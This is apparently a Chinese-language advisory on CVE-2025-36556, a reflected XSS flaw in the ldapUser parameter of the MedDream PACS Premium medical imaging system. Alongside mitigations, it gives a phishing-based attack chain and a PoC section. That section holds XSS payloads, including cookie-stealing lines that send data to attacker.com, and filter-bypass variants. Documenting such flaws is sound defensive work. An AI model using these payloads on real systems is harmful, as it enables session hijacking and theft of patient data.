CVE-2025-36556 MedDream PACS Premium 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-36556

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MedDream PACS Premium

漏洞概述

CVE-2025-36556是MedDream PACS Premium 7.3.6.870版本中存在的一个反射型跨站脚本（XSS）漏洞。该漏洞位于软件的ldapUser功能模块中，由于对用户输入的ldapUser参数缺乏充分的输入验证和输出编码，攻击者可以通过构造恶意的URL参数来注入任意JavaScript代码。当受害者点击攻击者精心设计的恶意链接时，反射的恶意脚本将在受害者的浏览器上下文中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。作为一款广泛应用于医疗机构的PACS（医学影像存档与传输系统）产品，该漏洞可能危及患者隐私数据和医疗系统安全。由于CVSS评分为6.1（中等严重级别），且攻击复杂度低、无需认证即可发起攻击，但需要用户交互触发，因此建议相关机构尽快采取修复措施。

技术细节

该漏洞属于反射型XSS（Cross-Site Scripting）漏洞，具体位于MedDream PACS Premium的ldapUser功能中。反射型XSS的原理是：应用程序将用户提交的数据未经适当处理直接返回给用户，攻击者通过构造包含恶意脚本的参数值，当用户访问包含该参数的URL时，恶意代码会被浏览器解析执行。

在ldapUser功能中，应用程序直接获取URL中的ldapUser参数值并回显到页面，而未对特殊字符（如<、>、"、'、/等）进行HTML实体编码或移除脚本标签。攻击者可以构造如下恶意URL：

http://[target]/path/ldapUser=<script>alert(document.cookie)</script>

当受害者访问该URL时，<script>标签会被浏览器作为HTML解析，alert()函数将被执行，从而证明漏洞存在。在实际攻击中，攻击者可以替换alert()为更恶意的代码，如窃取Cookie、劫持会话、重定向到钓鱼站点或植入键盘记录器等。

由于该产品主要服务于医疗机构，攻击者可能针对医疗工作人员或管理员进行定向攻击，以获取患者敏感数据或系统控制权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标机构是否使用MedDream PACS Premium系统，并确定版本号（需为7.3.6.870或更早版本）。可通过搜索引擎、Shodan等工具进行侦察。

STEP 2

步骤2: 构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，针对ldapUser参数注入XSS payload，如：?ldapUser=<script>恶意代码</script>或使用各种绕过技术的编码payload。

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时通讯、社交媒体等渠道向目标用户发送包含恶意链接的消息，诱导用户点击。消息内容通常伪装成与工作相关的紧急通知或系统消息。

STEP 4

步骤4: 触发漏洞

当受害者在浏览器中点击恶意链接访问MedDream PACS系统时，URL中的ldapUser参数值未经适当过滤被反射回页面，浏览器将恶意脚本作为合法脚本解析执行。

STEP 5

步骤5: 实施恶意行为

恶意JavaScript在受害者浏览器上下文中执行，可执行的操作包括：窃取会话Cookie获取账户权限、记录键盘输入窃取凭据、修改页面内容进行钓鱼、或将受害者重定向到恶意网站。

STEP 6

步骤6: 持久化控制

攻击者可能利用窃取的会话令牌冒充合法用户登录系统，进一步窃取患者医疗影像数据、修改系统配置或横向移动攻击其他内部系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-36556 PoC - Reflected XSS in MedDream PACS Premium ldapUser -->
<!-- This PoC demonstrates the XSS vulnerability in the ldapUser functionality -->
<!-- Replace the target URL and execute in a browser context -->

<!-- Basic XSS PoC -->
<form action="http://[TARGET_HOST]/[MEDDREAM_PATH]/" method="GET">
    <input type="hidden" name="ldapUser" value="<script>alert('XSS Vulnerability Confirmed - CVE-2025-36556')</script>">
    <input type="submit" value="Click to Test XSS">
</form>

<!-- Alternative PoC using img onerror -->
<!-- http://[TARGET_HOST]/[MEDDREAM_PATH]/?ldapUser=<img src=x onerror=alert(document.domain)> -->

<!-- Cookie Stealing PoC -->
<!-- http://[TARGET_HOST]/[MEDDREAM_PATH]/?ldapUser=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> -->

<!-- Session Hijacking PoC -->
<!-- <script>document.location='https://attacker.com/log?data='+document.cookie+'&url='+document.URL</script> -->

<!-- Test with various XSS payloads -->
<!-- 1. Simple alert: <script>alert(1)</script> -->
<!-- 2. Event handler: <img src=x onerror=alert(1)> -->
<!-- 3. SVG element: <svg onload=alert(1)> -->
<!-- 4. Body event: <body onload=alert(1)> -->
<!-- 5. Encoded: <script>alert(String.fromCharCode(88,83,83))</script> -->

影响范围

MedDream PACS Premium <= 7.3.6.870

防御指南

临时缓解措施

在厂商发布正式修复版本之前，可采取以下临时缓解措施：1）使用Web应用防火墙规则过滤包含<script>标签和事件处理器属性的请求；2）限制ldapUser参数的字符类型，仅允许字母数字字符；3）启用浏览器的XSS过滤器（如Chrome的XSS Auditor）；4）对所有输出内容实施严格的HTML编码；5）监控和审查Web服务器日志中的可疑URL请求；6）加强对医疗系统用户的安全意识培训，警惕来自不明来源的链接。